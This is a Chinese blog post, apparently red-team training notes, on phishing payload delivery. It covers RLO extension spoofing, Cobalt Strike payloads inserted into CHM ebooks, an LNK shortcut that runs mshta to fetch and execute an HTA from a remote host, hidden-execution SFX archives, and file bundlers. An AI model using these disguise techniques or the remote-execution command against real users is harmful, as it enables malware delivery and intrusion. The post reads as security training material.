红队APT-钓鱼投递篇&文件程序类&RLO伪装&LNK快捷&自解压运行&捆绑打包&CHM电子书

Ethan医生4个月前信息收集140

 红队APT-文件后缀-钓鱼伪装-RLO

 红队APT-电子书-CHM-加载JS&PS

 红队APT-快捷方式-LNK-加载&HTA

 红队APT-压缩文件-自解压-释放执行

 红队APT-捆绑文件-打包加载-释放执行

#RLO后缀

命令-插入Unicode字符->RLO模式

 image.png

#CHM电子书

CS生成上线:Attacks——>Web Drive by——>Scripted web Delivery

1、执行JS:见打包资源代码

2、上线JS:见打包资源代码

3、CHM伪装:

找一个正常的CHM电子书,解压后;

将Payload插入其中某个或整个页面;

加载编译,当电子书打开修改页面后上线。

解压命令:hh -decompile .\\html xx.CHM

-bitsadmin 模式

-Powershell 模式

 

#LNK快捷方式:

1、生成:Attacks -> Packages -> Html Application

2、上传:Attacks——>Web Drive by——>Host file

3、执行:C:\Windows\System32\mshta.exe http://xx.xx.xx.xx:xx/x.ext

4、伪装:

-创建快捷方式

image.png

-生成HTA并上传

-属性更改目标执行

-属性更改图标伪装

 

#自解压文件:

安装包&C2后门

1、打包勾选SFX

2、Advanced设置路径

3、Setup设置前后执行

4、Modes设置显示或隐藏

5、Update设置覆盖或更新

6、配合RLO将EXE伪装ZIP压缩

 

#捆绑打包文件:

自带:IExpress

第三方:捆绑器


捆绑比较复杂 因为把正常的程序绑定上去后 会将正常的和后门一起捆绑在一起 导致一起被查杀


相关文章

红队APT-钓鱼投递篇&免杀方案&代码混淆&远程分离&文件逃逸&Office&CHM&LNK&捆绑

➢ 红队APT-文件后缀-Office分离➢ 红队APT-免杀方案-CHM&LNK➢ 红队APT-免杀方案-自解压&捆绑免杀方案:#Office文档代码混...

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

红队APT-钓鱼投递篇&邮件系统&SPF绕过&自建SMTP&修改转发&Swaks伪造&Gophish平台

➢ 红队APT-邮件钓鱼-软硬绕过SPF➢ 红队APT-邮件钓鱼-SendCloud转发➢ 红队APT-邮件钓鱼-Gophish批量系统前置内容:钓鱼邮件是指黑客伪装成同...

蓝队技能-应急响应篇&内网攻防&爆破事件&代理隧道&流量提进程&系统日志&处置封锁

➢ 蓝队技能-内网攻防-口令爆破&隧道技术&排查&应急#口令横向场景说明:不管在内网还是在外网,协议口令爆破一直是攻击最常见的方式。1、明确对应口令爆破的日志存储路径...

红队APT-钓鱼投递篇&近源攻击&BadUSB存储&C2上线&Arduino开发&代码植入&免杀方案

➢ 红队APT-近源攻击-BadUSB-上线C2#BADUSB准备工作:1、购买badusb,购买链接:https://detail.tmall.com/item.htm?id=606447...

红队APT-钓鱼投递篇&网站钓鱼&工具克隆&数据异同步&手工导出修改&劫持用户&凭据窃取

➢ 红队APT-网页钓鱼-工具篇➢ 红队APT-网页钓鱼-手工篇➢ 红队APT-网页钓鱼-二维码#网页钓鱼:邮件中或其他方式配合网页钓鱼,以自行搭建的网页冒充真实站点,通...

蓝队技能-应急响应篇&日志采集&提取查看&自动化分析Web安全&内网攻防&工具项目

➢ 蓝队技能-工具项目-日志收集&提取查看&自动分析#日志自动提取1、七牛Logkit:(Windows&Linux&Mac等)项目地址:https://gi...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。